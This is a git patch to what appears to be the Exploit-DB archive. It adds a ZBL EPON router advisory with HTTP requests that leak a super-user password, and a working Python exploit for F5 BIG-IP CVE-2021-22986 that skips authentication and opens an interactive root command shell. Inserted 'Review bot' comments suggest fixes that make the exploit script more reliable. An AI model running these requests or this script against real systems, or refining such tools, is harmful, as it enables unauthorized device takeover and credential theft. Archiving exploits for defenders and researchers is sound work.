From cbe5b3f2e5c763fce3bd2fe0d7aa4d763afe35c4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 3 Apr 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-04-03

2 changes to exploits/shellcodes

ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
---
exploits/hardware/webapps/49737.txt | 82 +++++++++++++++++++++++++
exploits/hardware/webapps/49738.py | 92 +++++++++++++++++++++++++++++
files_exploits.csv | 2 +
3 files changed, 176 insertions(+)
create mode 100644 exploits/hardware/webapps/49737.txt
create mode 100755 exploits/hardware/webapps/49738.py

diff --git a/exploits/hardware/webapps/49737.txt b/exploits/hardware/webapps/49737.txt
new file mode 100644
index 000000000..7c409d555
--- /dev/null
+++ b/exploits/hardware/webapps/49737.txt
@@ -0,0 +1,82 @@
+# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
+# Date: 31.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
+
+Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
+Product web page: http://www.zblchina.com | http://www.wd-thailand.com
+Affected version: Firmwre: V100R001
+ Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
+ EONU Hardware Version V3.0
+ Software: V2.46.02P6T5S
+ Main Chip: RTL9607
+ Master Controller, Copyright (c) R&D
+
+Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
+router.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The limited administrative user (admin:admin)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint or the password page
+and disclose the http super user password. Once authenticated
+as super, an attacker will be granted access to additional and
+privileged functionalities.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5467
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
+
+
+31.01.2021
+
+--
+
+
+Get config file and disclose super pwd:
+---------------------------------------
+
+POST /HG104B-ZG-E.config HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://192.168.1.1/system_configure.asp
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+
+CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
+
+
+...
+ #web_1
+ user_web_name=super
+ user_web_password=www168nettv
+...
+
+
+Disclose super pwd from system pwd page:
+----------------------------------------
+
+GET /system_password.asp
+Host: 192.168.1.1
+
+...
+var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
+var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49738.py b/exploits/hardware/webapps/49738.py
new file mode 100755
index 000000000..0ca7f316a
--- /dev/null
+++ b/exploits/hardware/webapps/49738.py
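Review bot: The advisory reference is internally inconsistent: the `Advisory ID: ZSL-2021-5467` line and the `Advisory URL` ending in `ZSL-2021-5647.php` cannot both be right, so one is a digit transposition and readers following the link will land on the wrong (or a missing) advisory — correct whichever is wrong so the two agree. The Desc paragraph says the super password is disclosed by "sending a HTTP GET request to the configuration backup endpoint", but the PoC that follows is `POST /HG104B-ZG-E.config` with the form body `CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=`; the description should say POST, or state that both methods were verified. `Firmwre` in the Affected version line is a typo for `Firmware`. The disclosed credential `super:www168nettv` appears on two endpoints of the same unit; if it turns out to be a factory-wide default rather than per-device, that is a separate hard-coded-credential finding worth a sentence of its own — this advisory alone does not establish which.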
@@ -0,0 +1,92 @@
+# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
+# Exploit Author: Al1ex
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
+# CVE : CVE-2021-22986
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys
+
+
+def title():
+ print('''
+ ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __
+ / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / /
+ | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_
+ | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \
+ | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) |
+ \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/
+
+ Author:Al1ex@Heptagram
+ Github:https://github.com/Al1ex
+ ''')
+
+def exploit(url):
+ target_url = url + '/mgmt/shared/authn/login'
+ data = {
+ "bigipAuthCookie":"",
+ "username":"admin",
+ "loginReference":{"link":"/shared/gossip"},
+ "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
+ }
+ headers = {
+ "User-Agent": "hello-world",
+ "Content-Type":"application/x-www-form-urlencoded"
+ }
+ response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
+ if "/mgmt/shared/authz/tokens/" not in response.text:
+ print('(-) Get token fail !!!')
+ print('(*) Tested Method 2:')
+ header_2 = {
+ 'User-Agent': 'hello-world',
+ 'Content-Type': 'application/json',
+ 'X-F5-Auth-Token': '',
+ 'Authorization': 'Basic YWRtaW46QVNhc1M='
+ }
+ data_2 = {
+ "command": "run",
+ "utilCmdArgs": "-c whoami"
+ }
+ check_url = url + '/mgmt/tm/util/bash'
+ try:
+ response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
+ if response2.status_code == 200 and 'commandResult' in response2.text:
+ while True:
+ cmd = input("(:CMD)> ")
+ data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
+ r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
+ if r.status_code == 200 and 'commandResult' in r.text:
+ print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+ else:
+ print('(-) Not vuln...')
+ exit(0)
+ except Exception:
+ print('ERROR Connect')
+ print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
+ while True:
+ cmd = input("(:CMD)> ")
+ headers = {
+ "Content-Type": "application/json",
+ "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
+ }
+ data_json = {
+ "command": "run",
+ "utilCmdArgs": "-c \'%s\'"%(cmd)
+ }
+ exp_url= url + '/mgmt/tm/util/bash'
+ exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
+ if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
+ print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+ else:
+ print('(-) Not vuln...')
+ exit(0)
+
+if __name__ == '__main__':
+ title()
+ if(len(sys.argv) < 2):
+ print('[+] USAGE: python3 %s https://\n'%(sys.argv[0]))
+ exit(0)
+ else:
+ exploit(sys.argv[1])
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 13442679f..1768a8f91 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
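Review bot: In `exploit()`, the `except Exception:` branch of method 2 only prints `ERROR Connect` and then falls through to the `(+) Extract token` line, which indexes `response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1]` on a response the earlier `if` already established does not contain that path, so a connection error on the second request ends in an unhandled IndexError instead of a clean exit; add `return` (or `sys.exit(1)`) directly after `print('ERROR Connect')`. Both interactive loops build the shell argument as `"-c '%s'" % cmd`, which breaks on any command containing a single quote — `"-c %s" % shlex.quote(cmd)` with `import shlex` at the top keeps the wrapper's quoting intact. The `requests.post` inside the method-2 loop is the only call without a `timeout`; give it `timeout=20` like its neighbours so a hung target does not wedge the shell. The hard-coded `Authorization: Basic YWRtaW46QVNhc1M=` decodes to `admin:ASasS`; a one-line comment on whether the password value matters for this bypass (the empty `X-F5-Auth-Token` header suggests it may not) would spare the next reader from guessing.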
@@ -43914,3 +43914,5 @@ id,file,description,date,author,type,platform,port
 49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
 49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
+49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
+49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,